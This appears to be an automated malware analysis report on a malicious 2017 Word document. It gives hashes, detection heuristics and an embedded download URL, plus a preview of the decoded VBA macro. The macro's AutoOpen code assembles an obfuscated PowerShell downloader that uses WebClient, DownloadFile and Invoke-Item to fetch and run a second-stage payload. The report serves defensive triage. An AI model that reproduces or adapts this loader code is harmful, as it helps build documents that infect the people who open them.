Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 316736c47f41aafe…

MALICIOUS

Office (OLE)

166.5 KB Created: 2017-11-13 20:11:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: bd3765543298211eb81c5499af7d9387 SHA-1: ad05419e9d7c61cd78d2e50086033db426764cf3 SHA-256: 316736c47f41aafe160e6e242439e213c334f9ee88d6afb9eafdb201d0d46c1b
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader that uses CreateObject/Shell/exec. The AutoOpen macro is present and uses Shell() calls, which are often used to download and execute second-stage payloads. The embedded URL 'http://conceptttb.in/UTlxP+lxP/' is highly suspicious and likely serves as the download source for the payload.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscation-6398752-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6398752-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://conceptttb.in/UTlxP+lxP/,httlxP+lxPplxP+lxP://liansa89SC7E3� In document text (OLE body)
    • http://conceptttb.in/UTlxP+lxP/,httlxP+lxPplxP+lxP://liansa89SC7E3In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 159825 bytes
SHA-256: 55b110383cb2fa84092048db9a853a58813683de2e419c246c76b9d4670a0bc8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 52 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YAjTwo"
Sub AutoOpen()
zPzujiX = "KwuJuNi" + "MjGaAwi" + "idzWGzC" + "JBZOuUw"
JNzqSjHiB
CXPOENw = "jwSjbJt" + "pWWcOWV" + "lzYafUA" + "vVuAtmJ"
End Sub
Function iVqhHvuhz()
OjvRcFmsd = "" + vwwZpcw + OFSmWin + WHSJlmF + PTjNqWz + Mid("EMZpNwE5Z3lZsGHUbwMHGXIFOsEprEFeRence.tOStrInG()[1,3]+'x'-JOIn'')sw3wE2", 25, 41) + EwuLPla + oplTHtU + RrDTphL + hviVDjj
IbBGqtn = "iNMwFwK" + "JXaGsNh" + "Rjqiskw" + "bjtBpmW"
stamavRc = "BQqMCuJ" + "cYUBvJI" + "UcNwUdQ" + "OoqKwhC"
zSGwQiwW = "jTwPLoH" + "HkuqTYp" + "IVdzbpH" + "DjFVJGm"
YwCNWQYW = "" + SFBEaFT + NNXrucm + quBhUfk + tmGRtDw + Mid("LRFU5CuTzLf78jw6KYLhAZo(('(DzK &((gv lxP*mdR*lxP).naMe[3,11,2]-JOinlxPlxP)( (D'+'zK+DzKlxPmLlfranc = newlxP+lxP-object System.lxP+lxPNelxP'+'+lxPt.WebClilxP+lp0z32ipThLPBi", 24, 135) + rNFpvLN + zUFfhIm + njULTSh + rinfjHZ
uniVsIsour = "SumhBWV" + "ARCzRZq" + "ZwCnXwF" + "GlFZlPA"
vAtwuTBn = "iSJODoh" + "aSzfmQn" + "PSMCtqR" + "mlsJJTM"
zGtZXcimNAG = "IhIQGVV" + "zskOkJz" + "iEIkiSq" + "TtXsYis"
ZmDpSZ = "" + bnIhRIh + jYaBVpn + kYimcTb + fUPoitP + Mid("hTIJlUdz8xPeptionlxP+l'+'xP.MessaglxP'+'+lxPe;}}lxP).REPLACE(([chAR]'+'52+['+'chAR]86+[chAR]68),[striNG][chA'+'R]92).R'+'EPLACE(lxPO20'+'OTC0LVwcmbWW", 10, 128) + tFnzauS + jjrRkwh + jTUzczE + qzIpzww
sjajYcq = "TtsjPSq" + "TmBuvUB" + "oqVsUtw" + "AupGvKD"
fjtwr = "HfKdvWP" + "pzhVjrN" + "jSEhcCB" + "HmwcEzT"
wXBQSwWWN = "wCdTHnM" + "HqQzwlz" + "qnXnClT" + "bkYSHBA"
tvmpM = "" + niiRCQz + ZoBMzXS + EBAmMNd + QHZpIui + Mid("ST8Il9H3kn2C7Izm8A1mJGRP+lxPhuas);InvolxP+lxPke-IlxP'+'+lxPDzK+DzKtem(mLlhlxP+lxPuas);brealxP+lxPk;}caDzK+DzKlxP+lDzK+DzmoUoQ3IpcPihQW", 24, 97) + WPzkuzw + qoqwjtn + LqMwTiA + zYRoLwX
qNlqNhVz = "aEbuVQD" + "ZCbFXVN" + "NJncTpE" + "RNsoPiW"
BAGWXkIfsY = "qhviBZP" + "kPENdkm" + "nkrwJmm" + "PiMrISJ"
PCoaBkSIIc = "qiFGiji" + "UjWWvzc" + "ujOqESd" + "cBsGvkb"
NoMoNZc = "" + UZNoJVu + zBEAfNj + NzmvHQz + jiprjNk + Mid("zLjQ7IXuh5C2K'+'xPtcDzK+D'+'zKlDzK+DzKxP+lxPh{wrilxP+lxPtDzK+DzKelxP+lxPDzK+DzK-DzK+DzKhostlxPDz'+'K+DzK+l'+'xP mLlxP+lxPl'+'_.ExclxP'+'+lnAzkS", 13, 126) + HvAPJYh + SsHaGIl + pnFafzl + HJIvCGo
SujQWshXzGP = "vYzaHKq" + "GDlVpzu" + "HiUBIMq" + "qjQDNzz"
hmXMSWK = "lrTHRsW" + "TKAwwuj" + "jUEqAqA" + "inuuuzF"
otCKzmktS = "pjWuLrU" + "MROXGXn" + "UUCKRHG" + "OLNNIzH"
PvFYrWRkHo = "" + qStTMJT + skdqzaU + IjDrMIs + BBLGJqp + Mid("0LDzK+DzK'+'P+lxPm'+'DzK+Dz'+'KLlflxP+lx'+'PranclxP+lxP.DlxP+lxPowlxP+lxPnloadlxP+lxPFi'+'le(mLlxP+lxPlabclxP+lxP.TlxP+lDzK+DzKxPoS7EAVEXQlQ", 3, 129) + zWOsiLV + vTpnzkh + dtESDIV + XjLBPKp
uzDbq = "RhMCTdu" + "NOzQPzN" + "MOEPYLX" + "HHoGhUZ"
hcobhCXSw = "nDqTAji" + "mckiGmQ" + "fHBnJHL" + "VGmrzRJ"
pEKcRjOwv = "aYwlIUa" + "LGzPTja" + "lUlRYHc" + "AnSYNOR"
sOGNSstzwP = "" + EYpYkkm + BZbJhal + dMvGJPB + VOFOOhj + Mid("vnrzN2ALqwoCQ7C0lttrilxP+lxPDzK+DzKng'+'(), mLllxpIBOz3i6K3uj6", 19, 31) + sTGRIzi + ujpdjJD + CZEnmSK + fCLjEwi
CaFcj = "KkJWCGI" + "GUrYaCj" + "dGccFwS" + "oAbcPVM"
XiYSUOCko = "QvkEAAj" + "wfHiDvv" + "FNPLQaC" + "vjEzAQV"
JEwVh = "khunkvq" + "YHTaCzi" + "aUzBDXj" + "nLQwvKV"
tVfHDFNNsKf = "" + vkNaXUO + HzwslzW + dopkUMb + OaSlQcH + Mid("T7wMC9wHxP+lxPhuaslxP+lxP = mLlenDzK+DzKv:publilxP+lxPc lxPEOid46OW23LfAbj", 9, 51) + GiDSChP + fkUnAzY + HDrcQcj + CdOkUih
jXYjL = "KvpGrHA" + "PtajQGz" + "DVwUOCH" + "WbIzAXE"
YLMjzjzd = "FphiCiV" + "pihIqYr" + "KQtAVmw" + "HRPGcan"
SoCdJTlz = "UjHrjwK" + "DsANXcO" + "qPLXiPM" + "KPwflFz"
jvZqjVkz = "" + smzKjRB + EizKaKR + IMwqMja + YnPvtsp + Mid("5HsRBsI9).REPLACE(([chAR]109+[chAR]76+[chAR]1'+'08),[striNG][chAR]36)'+')DzK).RePLace(DzKlxPDzK,[stRINg][cHar]39) q2YiEX')-crEplace  'q2Y',[CHaRIczWG7q5", 8, 137) + uPBhGlW + LhbVjVN + tczGKjR + FJmVZzU
PIqzsfok = "zhOqYMJ" + "TvdUYvw" + "iXUjLMf" + "KSojMYp"
cjptmskL = "GPMhnCM" + "zMfHJEZ" + "jUmllV
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.